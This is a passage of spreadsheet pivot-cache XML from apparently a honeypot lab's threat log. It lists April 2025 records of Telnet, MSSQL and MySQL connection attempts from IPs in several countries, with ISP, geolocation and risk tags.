    <s v="California"/>
    <s v="San Diego"/>
    <s v="San Diego"/>
    <s v="5391811"/>
    <s v="92101"/>
    <s v="32.7157"/>
    <s v="-117.161"/>
    <s v="22773"/>
    <s v="Cox Communications Inc."/>
    <s v="Cox Communications Inc."/>
    <s v="business"/>
    <s v="Cox Communications Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:440f:1293"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1631"/>
    <x v="1631"/>
    <s v="95-42-53-27.ip.btc-net.bg&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T16:36:02"/>
    <d v="2025-03-28T08:40:06"/>
    <d v="2025-04-15T16:36:02"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="BG"/>
    <s v="Bulgaria"/>
    <s v="22"/>
    <s v="Sofia-grad"/>
    <s v="Sofia"/>
    <s v="Sofia"/>
    <s v="727011"/>
    <s v="1000"/>
    <s v="42.6977"/>
    <s v="23.3219"/>
    <s v="8866"/>
    <s v="Vivacom Bulgaria EAD"/>
    <s v="BTC-BROADBAND"/>
    <s v="residential"/>
    <s v="BTC Plc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5f2a:351b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1632"/>
    <x v="1632"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T16:28:47"/>
    <d v="2025-04-15T16:28:47"/>
    <d v="2025-04-15T16:28:47"/>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d:9cb8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1633"/>
    <x v="1633"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T16:21:36"/>
    <d v="2025-04-15T16:21:36"/>
    <d v="2025-04-15T16:21:36"/>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3b5d:ef7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1634"/>
    <x v="1634"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T16:05:38"/>
    <d v="2024-07-01T01:02:00"/>
    <d v="2025-04-15T16:05:38"/>
    <n v="117"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_VNC_H4&amp;&amp;SMA-LAB_SIP_H28&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_MT-CPA_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;3306&amp;&amp;5900&amp;&amp;5060&amp;&amp;3389&amp;&amp;1433&amp;&amp;1080&amp;&amp;9100&amp;&amp;30079"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Ahmadabad"/>
    <s v="Ahmedabad (Shahibaugh)"/>
    <s v="1279233"/>
    <s v="380001"/>
    <s v="23.0591"/>
    <s v="72.5875"/>
    <s v="45916"/>
    <s v="Gujarat Telelink Pvt Ltd"/>
    <s v="ANTRIKSSH CABLE SERVICES Pvt. Ltd"/>
    <s v="residential"/>
    <s v="Gtpl Broadband Pvt. Ltd."/>
    <s v="2013-06-12"/>
    <s v="GUJARATKUTCHNETWORK"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67f9:eb0c"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1635"/>
    <x v="1635"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T15:53:43"/>
    <d v="2025-04-14T22:35:16"/>
    <d v="2025-04-15T15:53:43"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="18403"/>
    <s v="FPT Telecom Company"/>
    <s v="FPT Telecom Company"/>
    <s v="cellular"/>
    <s v="FPTDYNAMICIP"/>
    <s v="2010-05-26"/>
    <s v="FPTDYNAMICIP-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:136:b515"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1636"/>
    <x v="1636"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T15:41:16"/>
    <d v="2025-03-06T12:42:18"/>
    <d v="2025-04-15T15:41:16"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NIB"/>
    <s v="2007-08-01"/>
    <s v="BSNLNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:af8c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1637"/>
    <x v="1637"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T15:24:10"/>
    <d v="2025-04-15T15:23:29"/>
    <d v="2025-04-15T15:24:10"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Pune"/>
    <s v="Khadki"/>
    <s v="1267195"/>
    <s v="NA"/>
    <s v="18.5635"/>
    <s v="73.85210000000001"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Limited"/>
    <s v="residential"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="2010-09-14"/>
    <s v="ABTS-DSL-DEL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dfe9:54e2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1638"/>
    <x v="1638"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T15:16:51"/>
    <d v="2025-04-15T15:16:51"/>
    <d v="2025-04-15T15:16:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d2:d857"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1639"/>
    <x v="1639"/>
    <s v="node-gh0.pool-1-10.dynamic.totinternet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T15:14:31"/>
    <d v="2025-04-14T05:59:46"/>
    <d v="2025-04-15T15:14:31"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Bang Sue"/>
    <s v="Bang Sue"/>
    <s v="6845329"/>
    <s v="NA"/>
    <s v="13.81"/>
    <s v="100.537"/>
    <s v="23969"/>
    <s v="TOT Public Company Limited"/>
    <s v="TOT Public Company Limited"/>
    <s v="residential"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:10a:d364"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1640"/>
    <x v="1640"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T15:10:01"/>
    <d v="2025-04-13T12:38:04"/>
    <d v="2025-04-15T15:10:01"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Ernakulam"/>
    <s v="Kochi"/>
    <s v="1273874"/>
    <s v="NA"/>
    <s v="9.93988"/>
    <s v="76.2602"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Limited"/>
    <s v="cellular"/>
    <s v="Bharti Airtel Ltd"/>
    <s v="None"/>
    <s v="Bhubaneswar"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6ade:ef92"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1641"/>
    <x v="1641"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T15:09:45"/>
    <d v="2024-12-27T02:43:11"/>
    <d v="2025-04-15T15:09:45"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71b0:4d8"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1642"/>
    <x v="1642"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T15:09:05"/>
    <d v="2025-04-15T15:09:05"/>
    <d v="2025-04-15T15:09:05"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:c121"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1643"/>
    <x v="1643"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T15:08:03"/>
    <d v="2025-04-15T15:08:03"/>
    <d v="2025-04-15T15:08:03"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="35"/>
    <s v="İzmir Province"/>
    <s v="NA"/>
    <s v="Izmir"/>
    <s v="311046"/>
    <s v="NA"/>
    <s v="38.4237"/>
    <s v="27.1428"/>
    <s v="47331"/>
    <s v="TTNET"/>
    <s v="TTNet A.S."/>
    <s v="consumer"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4ebd:6459"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1644"/>
    <x v="1644"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T15:05:54"/>
    <d v="2025-04-15T11:50:09"/>
    <d v="2025-04-15T15:05:54"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b58:3251"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1645"/>
    <x v="1645"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T15:01:31"/>
    <d v="2025-04-15T15:01:31"/>
    <d v="2025-04-15T15:01:31"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:d203"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1646"/>
    <x v="1646"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T14:53:55"/>
    <d v="2025-04-03T10:18:02"/>
    <d v="2025-04-15T14:53:55"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Faridabad"/>
    <s v="Faridabad (Nehru Ground)"/>
    <s v="1271951"/>
    <s v="121002"/>
    <s v="28.3905"/>
    <s v="77.3052"/>
    <s v="133647"/>
    <s v="ELXIRE DATA SERVICES PVT. LTD."/>
    <s v="Elxire IT Solution"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="ELXIREITSOL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6732:731"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1647"/>
    <x v="1647"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T14:44:49"/>
    <d v="2025-01-19T00:18:30"/>
    <d v="2025-04-15T14:44:49"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="PI"/>
    <s v="Piauí"/>
    <s v="Picos"/>
    <s v="Picos"/>
    <s v="3392167"/>
    <s v="64600-000"/>
    <s v="-7.08421"/>
    <s v="-41.4708"/>
    <s v="28202"/>
    <s v="Rede Brasileira de Comunicacao S/A"/>
    <s v="Rede Brasileira de Comunicacao S/A"/>
    <s v="business"/>
    <s v="Rede Brasileira de Comunicacao S/A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b182:80f6"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1648"/>
    <x v="1648"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T14:40:55"/>
    <d v="2025-04-15T14:40:55"/>
    <d v="2025-04-15T14:40:55"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PY"/>
    <s v="Puducherry"/>
    <s v="Karaikal"/>
    <s v="Karaikal"/>
    <s v="1267887"/>
    <s v="NA"/>
    <s v="10.9167"/>
    <s v="79.8333"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
